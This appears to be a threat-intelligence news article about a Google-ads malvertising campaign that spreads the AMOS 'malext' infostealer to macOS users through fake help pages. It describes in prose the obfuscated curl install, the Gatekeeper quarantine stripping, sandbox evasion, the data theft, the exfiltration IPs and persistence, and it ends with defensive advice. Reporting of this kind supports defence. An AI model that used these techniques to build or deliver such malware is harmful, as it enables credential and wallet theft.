A sophisticated malvertising campaign is actively targeting macOS users globally, deploying a new variant of the AMOS infostealer named “malext.” Attackers are leveraging Google Search ads to direct unsuspecting victims to fake help articles on free text-sharing platforms. These seemingly innocuous pages contain deceptive terminal commands that silently install the potent infostealer onto users’ machines, posing a significant threat to personal data security.
The operation came to light when a macOS user, seeking assistance with storage cleanup, encountered a top Google search result linking to a fake Medium blog post. While appearing legitimate, the article provided a seemingly helpful terminal command. Suspicion arose only when the user’s device repeatedly requested the administrative password, an unusual behavior that narrowly averted a full system compromise and prompted further investigation.
Unveiling the AMOS ‘malext’ Infostealer Campaign
Following the initial incident, computer enthusiast Gi7w0rm, in collaboration with researcher @itspappy, identified the malware. @itspappy had observed a pattern of macOS malware distributed through ClickFix-style tactics linked to compromised Google ads. A thorough review of Google’s Ads Transparency tool revealed more than 34 active attack chains and over 53 hijacked Google Ads accounts being used to disseminate these malicious lures. The extensive scale of this operation suggests the involvement of an organized criminal group, likely operating as a “Traffer” network.
The attackers are not limited to a single platform for hosting their deceptive content. Beyond Medium, fake articles have been found on Evernote, mssg.me, and kimi.com—services that do not require stringent identity verification for use. Evidence suggests that as soon as a malicious article is flagged and removed, the attackers promptly replace it, demonstrating a highly organized and persistent operational strategy. These fraudulent pages are designed to mimic genuine help guides, guiding victims through a two-step process culminating in the execution of a harmful terminal command.
The ultimate payload, identified as “malext,” is a novel variant of the AMOS (Atomic macOS Stealer). Its designation stems from the command-and-control (C2) domain, malext[.]com, which is hardcoded within the malware samples. Once active, malext is engineered to harvest a wide range of sensitive information from infected systems. This includes browser credentials, data from Apple Notes, Safari cookies, cryptocurrency wallet details, Telegram session data, and the macOS keychain. Furthermore, the stealer is capable of backdooring Ledger and Trezor wallet applications by stealthily replacing them with trojanized versions, thereby granting attackers sustained access to a victim’s financial assets.
Inside the Kill Chain: Infection and Persistence Mechanisms
The infection process begins when a user inadvertently copies and pastes the terminal command from a lure page into their system. Decoding involves a base64-encoded curl request, fetching a remote script that uniquely employs both Base64 encoding and gzip compression—a rare double-obfuscation technique. Upon successful unpacking, the command downloads a MachO binary to the /tmp directory. It then systematically strips macOS’s Gatekeeper quarantine flag using the xattr -c command, allowing the binary to execute without any visible warnings to the user.
Prior to executing the main stealing functions, the downloaded MachO binary, compiled for both ARM and x86-64 architectures, initiates a virtual machine (VM) detection check. This check, obfuscated via a Caesar cipher, queries macOS’s system_profiler for indicators of virtualized environments like QEMU, VMware, or KVM. It also scrutinizes hardware characteristics commonly found in sandbox environments, such as fabricated board serial numbers and unusually old processor models. This multi-faceted approach has proven effective in preventing execution across major macOS sandboxing platforms, including VirusTotal and Tria.ge.
When no sandbox environment is detected, the primary AppleScript payload, comprising approximately 59,444 characters, is executed. This script operates discreetly by hiding the terminal window, gathering extensive hardware details, and attempting to steal the macOS login password. If no stored credential is found, it may prompt the user with a fake helper installation dialog to solicit the password. Subsequently, the stealer systematically scans browser profiles, cryptocurrency wallets, the macOS keychain, Telegram sessions, and Apple Notes. All collected data is compressed into a zip archive for exfiltration. The primary exfiltration target is the IP address 38.244.158[.]56, with 199.217.98.33 serving as a backup destination. For persistence, the malware installs a LaunchDaemon plist file named com.finder.helper.plist, ensuring the backdoor restarts automatically upon every system reboot.
macOS users should rigorously avoid pasting terminal commands obtained from online articles, regardless of their apparent helpfulness. It is crucial to maintain enabled security features such as Gatekeeper and System Integrity Protection. Approaching any search result flagged as an advertisement on Google with a heightened sense of caution is also recommended. In the event of a suspected infection, immediate action is necessary. This includes removing the files ~/.pass, ~/.agent, ~/.mainhelper, ~/.username, and the LaunchDaemon entry com.finder.helper.plist. Furthermore, all browser-saved passwords should be reset, and any affected cryptocurrency wallet applications should be reinstalled from their official sources.